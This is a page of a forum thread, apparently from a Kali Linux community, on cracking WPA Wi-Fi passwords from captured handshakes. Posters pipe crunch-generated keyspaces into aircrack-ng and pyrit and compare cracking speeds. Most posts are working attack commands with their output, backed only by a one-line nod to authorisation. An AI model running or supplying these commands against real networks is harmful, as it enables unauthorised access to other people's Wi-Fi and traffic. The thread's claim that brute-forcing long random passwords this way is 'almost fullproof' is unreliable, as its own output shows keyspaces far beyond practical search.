Page 1 of 4 123 ... LastLast
Results 1 to 10 of 38

Thread: Cracking WPA key with crunch | aircrack (almost fullproof but how speed things up)

  1. #1
    Member
    Join Date
    Jun 2013
    Posts
    43

    Question Cracking WPA key with crunch | aircrack (almost fullproof but how speed things up)

    Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and now how to get them.
    that's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
    I was looking for a method that is full proof without actually storing a huge wordlist on your desktop (talking about lots of lots of terrabites)
    so i came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters with alfanumeric small and cap characters that are not stored in a wordlistfile.
    The "|" ends the crunch command and then we go to the aircrack command:
    With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- wich specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (wich is an easy password because there are no caps in the password)
    However I believe its almost a fullproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Anyone has an idea how to edit my command in function of speeding up the cracking process with a precalculating tool cause that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in kali linux.
    Last edited by leevai; 08-10-2013 at 08:18 AM. Reason: faulth in my kali command that needs an edit

  2. #2
    Senior Member
    Join Date
    Mar 2013
    Location
    milano
    Posts
    186
    Quote Originally Posted by leevai View Post
    Hello guys, I'm not going to discuss handshakes since I guess you all are familiar with airmon, airodump and aireplay and now how to get them.
    that's about the first step in cracking WPA and the easy job. The hard job is to actually crack the WPA key from the capfile.
    I was looking for a method that is full proof without actually storing a huge wordlist on your desktop (talking about lots of lots of terrabites)
    so i came up with the following:

    # crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap

    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)

    meaning that crunch is making a list with minimum 0 and maximum 25 characters with alfanumeric small and cap characters that are not stored in a wordlistfile.
    The "|" ends the crunch command and then we go to the aircrack command:
    With the bssid of the "victim" (notice you have to be authorised by the victim to do the test) and -w- wich specifies the handshake.cap file.


    It took me about 30 minutes to crack the following WPA password: hickmin123 (wich is an easy password because there are no caps in the password)
    However I believe its almost a fullproof method and with lots of time you are able to crack long passwords.
    Now the real question...

    Anyone has an idea how to edit my command in function of speeding up the cracking process with a precalculating tool cause that would be the coolest thing :-)
    Please notice I only like to use programs preinstalled in kali linux.
    hi
    i'm not expert but the process of GPU-cracking is more fast!!
    my old-simple example with cuda
    https://vimeo.com/62995190

  3. #3
    Member
    Join Date
    Jun 2013
    Posts
    43
    hi
    i'm not expert but the process of GPU-cracking is more fast!!
    my old-simple example with cuda
    https://vimeo.com/62995190


    isn't that a method with existing wordlists? I'm looking for fast method to crack 12 digit unknown password with combination of small, caps and numbers and not in dictionary passwords with random combinations.
    Tried to watch the vid but unfortunately the quality of the vid is pretty low and can't read much of the screens.. sorry

  4. #4
    Junior Member
    Join Date
    Mar 2013
    Posts
    27
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

  5. #5
    Senior Member
    Join Date
    Mar 2013
    Location
    milano
    Posts
    186
    Quote Originally Posted by hausoo View Post
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    @thanks +1 to help me to explane.....i've a extraterrestrial language
    @leevay sorry for the quality-video(but it's a partial-web-hosting-problem)..the FONT-VIDEO ,i have uploaded is good-quality!...however if you HAVE "" cuda-enable "" read the response of hausoo's friend ..contains the same question of my video
    bye
    Last edited by zimmaro; 08-10-2013 at 03:48 PM.

  6. #6
    Member
    Join Date
    Jun 2013
    Posts
    43
    thanks a lot zimmaro!!

    Quote Originally Posted by zimmaro View Post
    @thanks +1 to help me to explane.....i've a extraterrestrial language
    @leevay sorry for the quality-video(but it's a partial-web-hosting-problem)..the FONT-VIDEO ,i have uploaded is good-quality!...however if you "" cuda-enable "" read the response of hausoo's friend
    bye

  7. #7
    Member
    Join Date
    Jun 2013
    Posts
    43
    hy haussoo,
    thanks for the reply a lot! I did a first check and seems to work fine. tomorrow i will be doing a test on my home pc as it is a much faster computer.

    Quote Originally Posted by hausoo View Post
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ0123456789 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

  8. #8
    Member
    Join Date
    Jun 2013
    Posts
    43
    Is it possible this speeds up about 25%? greetz

  9. #9
    Junior Member
    Join Date
    Mar 2013
    Posts
    27
    yes depends on your video card (cuda_cores)

    crack 12 digit unknown passwd

    crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWX YZ1234567890 | pyrit -r xxx.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough

    crunch+aircrack-ng cpu-only

    HTML Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | aircrack-ng -w - -b xx:xx:xx:xx:xx:xx capture-03.cap
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Opening capture-03.cap
    Reading packets, please wait...
    
    
    
                                     Aircrack-ng 1.2 beta1
    
    
                       [00:00:45] 180855 keys tested (4367.42 k/s)
    crunch+pyrit cpu+GPU (cuda 334 cores)
    Code:
    ~# crunch 12 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 | pyrit -r capture-03.cap -b xx:xx:xx:xx:xx:xx -i - attack_passthrough
    Crunch will now generate the following amount of data: 12018631630886850560 bytes
    11461860304724 MB
    11193222953 GB
    10930881 TB
    10674 PB
    Crunch will now generate the following number of lines: 16533293572437839872 
    Pyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
    This code is distributed under the GNU General Public License v3+
    
    Parsing file 'capture-03.cap' (1/1)...
    Parsed 47 packets (47 802.11-packets), got 1 AP(s)
    
    ^CCrunch ending at aaaaaaaajKUl0 23400 PMKs per second.

  10. #10
    Quote Originally Posted by leevai View Post
    Code:
    crunch 0 25 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 | aircrack-ng --bssid aa:aa:aa:aa:aa:aa -w- handshakefile.cap
    (notice there is a space in the command that shouldnt be there, i guess the forum can't handle 62characters word)
    This is a great post. Thanks. Especially pointing out the little vB code issue, most people overlook these small details. You could use CODE syntax to fix it.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •